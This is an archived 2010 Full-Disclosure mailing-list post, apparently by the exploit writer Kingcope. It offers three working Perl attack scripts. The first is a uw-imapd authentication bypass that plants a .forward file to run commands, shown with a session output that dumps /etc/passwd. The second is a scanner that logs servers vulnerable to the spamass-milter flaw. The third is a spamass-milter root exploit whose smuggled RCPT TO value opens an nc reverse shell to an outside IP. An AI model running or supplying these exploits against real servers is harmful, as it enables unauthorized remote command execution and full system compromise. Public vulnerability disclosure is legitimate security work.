[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
- To: full-disclosure@xxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Two goodies. uw-imapd < 2004b remote exploit && spamass-milter vuln verifier
- From: Kingcope <kcope2@xxxxxxxxxxxxxx>
- Date: Mon, 15 Mar 2010 21:27:16 +0100
(See Attached)
Cheers,
Kingcope
Here are two goodies.
1.) uw-imapd < imap-2004b Remote Exploit
2.) Spamass-milter 0day vulnerability verifier + root exploit (at the bottom)
WARNING: USE AT YOUR OWN RISK + YOU WON'T FIND MANY TARGETS FOR BOTHS VULNS, I
VERIFIED.
---snip---
#!/usr/bin/perl
# CVE-2005-0198 Exploit by Kingcope
# Exploited in May 2010
# One can See from the imap Banner if the Server is Vulnerable:
# Vulnerable (CRAM-MD5 supported and right IMAP4rev1 Version) is e.g.:
# * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN]
localhost IMAP4rev1 2002.332 at Sun, 14 Mar 2010 20:40:09 +0000 (GMT)
# You need a VALID username but NOT A VALID password
# Relies on both uw-imapd (< imap-2004b) and a MTA like sendmail to be
installed remotely (.forward trickery).
# EXPLOIT SESSION:
#
#./imap.pl 192.168.2.17 kcope "cat /etc/passwd"
#uw-imapd (< imap-2004b) remote exploit by Kingcope
#* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN]
[192.168.2.
#17] IMAP4rev1 2003.338 at Sun, 14 Mar 2010 23:53:53 +0000 (GMT)
#
#++ Break In 1
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT
S
#CAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User kcope
authent
#icated
#++ SUCCESS 1 - Authenticated
#++ Break In 2
#220 localhost.Belkin ESMTP Sendmail 8.12.9p2/8.12.9; Sun, 14 Mar 2010 23:54:08
G
#MT
#250 localhost.Belkin Hello [192.168.2.15], pleased to meet you
#250 2.1.0 me@xxxxxxxxxxxxx Sender ok
#250 2.1.5 kcope@xxxxxxxxxxxxxxxxxxx Recipient ok
#354 Enter mail, end with "." on a line by itself
#250 2.0.0 o2ENs82U002757 Message accepted for delivery
#++ Waiting for .forward file to be executed
#A002 OK DELETE completed
#A002 OK CREATE completed
#+ Ready for argument
#A002 OK APPEND completed
#* 1 EXISTS
#* 1 RECENT
#* OK [UIDVALIDITY 1268610848] UID validity status
#* OK [UIDNEXT 2] Predicted next UID
#* NO [UIDNOTSTICKY] Non-permanent unique identifiers: /tmp/0wned
#* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
#* OK [PERMANENTFLAGS ()] Permanent flags
#* OK [UNSEEN 1] first unseen message in /tmp/0wned
#A002 OK [READ-ONLY] SELECT completed
#* 1 FETCH (BODY[] {1334}
#Date: Sun, 14 Mar 2010 23:54:08 +0000
#From: kcope@xxxxxxxxxxxxxxxx
#Subject: /tmp/0wned
#MIME-Version: 1.0
#Content-Type: TEXT/PLAIN; charset=US-ASCII
# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
#root:*:0:0:Charlie &:/root:/bin/csh
#toor:*:0:0:Bourne-again Superuser:/root:
#daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
#operator:*:2:5:System &:/:/sbin/nologin
#bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
#tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
#kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
#games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
#news:*:8:8:News Subsystem:/:/sbin/nologin
#man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
#sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
#smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
#mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
#bind:*:53:53:Bind Sandbox:/:/sbin/nologin
#uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
#xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
#pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
#www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
#nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
#kcope:*:1001:0:User &:/home/kcope:/bin/sh
#)
#* 1 FETCH (FLAGS (\Recent \Seen))
#A002 OK FETCH completed
use Digest::HMAC_MD5 qw(hmac_md5_hex);
use MIME::Base64;
use IO::Socket::INET;
print "uw-imapd (< imap-2004b) remote exploit by Kingcope\r\n";
if ($#ARGV != 2) {
print "usage: imap.pl <host> <user> <command>\n";
print "example: imap.pl www.target.com foouser \"cat /etc/services\"\n";
exit;
}
$host = $ARGV[0];
$command = $ARGV[2];
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 143,
Proto => 'tcp');
$resp = <$sock>;
print $resp."\n";
print "++ Break In 1\n";
for ($k=0;$k<5;$k++) {
print $sock "A001 AUTHENTICATE CRAM-MD5\r\n";
$resp = <$sock>;
print $resp;
if (index($resp, "+") != 0) {
print "-- No CRAM-MD5 Authen supported .\n";
exit;
}
$user = $ARGV[1];
$secret = "waco";
@data = split(" ", $resp);
chomp($data[1]);
$stamp = $data[1];
$decoded_stamp = decode_base64($stamp);
$hmac = hmac_md5_hex($decoded_stamp, $secret);
$answer = encode_base64($user . ' ' . $hmac);
chomp($answer);
print $sock $answer . "\r\n";
$resp = <$sock>;
print $resp;
if (index($resp, "OK ") >= 0) {
goto Authenticated;
}
}
print "-- Could not bypass Authen .\n";
exit;
Authenticated:
print "++ SUCCESS 1 - Authenticated\n";
print "++ Break In 2\n";
$msg = "|\"/bin/sh -c '$command' > /tmp/0wned 2>&1;\"";
print $sock "A002 DELETE .forward\r\n";
print $sock "A002 CREATE .forward\r\n";
print $sock "A002 APPEND .forward (\\Seen) {". length($msg) ."}\r\n" . $msg
."\r\n";
$sock2 = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => 25,
Proto => 'tcp');
$resp = <$sock2>;
print $resp;
print $sock2 "HELO you\r\n";
$resp = <$sock2>;
print $resp;
@remhost = split(" ", $resp);
print $sock2 "MAIL FROM: me\@foobar.org\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "RCPT TO: kcope\@$remhost[1]\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "DATA\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 ".\r\n";
$resp = <$sock2>;
print $resp;
print "++ Waiting for .forward file to be executed\r\n";
sleep(3);
print $sock "A002 SELECT /tmp/0wned\r\n";
$resp = <$sock>;
print $resp;
print $sock "A002 FETCH 1 BODY[]\r\n";
while(<$sock>) {
print $_;
}
---snip---
The following script will check if a remote server is vulnerable to
the spamass-milter vulnerability.
---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
exit;
}
print "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
close LOGFILE;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|pkill -HUP smtpd|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
print "\n\n$ARGV[0] IS VULNERABLE!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
close LOGFILE;
exit;
}
print $x;
print $sock "RCPT TO: postmaster+(\"|pkill -HUP sendmail|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
print "\n\n$ARGV[0] IS VULNERABLE!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
close LOGFILE;
exit;
}
print $x;
print $sock "QUIT\r\n";
while(<$sock>) {
print;
}
---snip---
Spamass-milter Root Exploit PoC
---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
use IO::Socket;
$|=1;
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock
"XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
exit;
}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '25',
Proto => 'tcp');
$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|nc -e /bin/sh 85.25.67.37 5555;sleep
1000|\")\@$hostname[1]\r\n"; # POSTFIX!
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+(\"|nc -e /bin/sh 85.25.67.37 5555;sleep
1000|\")\@$hostname[1]\r\n"; # SENDMAIL!
$x = <$sock>;
print $x;
print $sock "QUIT\r\n";
while(<$sock>) {
print;
}
---snip---
Cheers,
Kingcope_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/